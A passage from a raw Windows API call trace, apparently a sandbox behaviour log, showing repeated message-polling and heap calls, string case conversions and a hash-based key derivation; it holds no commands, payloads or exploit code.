hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.853] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.853] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.853] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.853] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.853] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.853] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.853] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.854] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.854] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.854] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.854] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.854] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.854] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.854] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.855] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.855] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.855] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.855] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.855] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.855] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.856] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0188.857] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.857] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.857] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.857] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.858] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.858] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.859] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.859] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.859] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.859] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.860] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.860] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.860] CryptHashData (hHash=0xaa58e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.861] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.861] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.861] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.861] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.861] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.862] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.862] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.862] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.862] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.862] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.863] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.863] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.863] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.863] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0188.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.864] HeapFree (in: 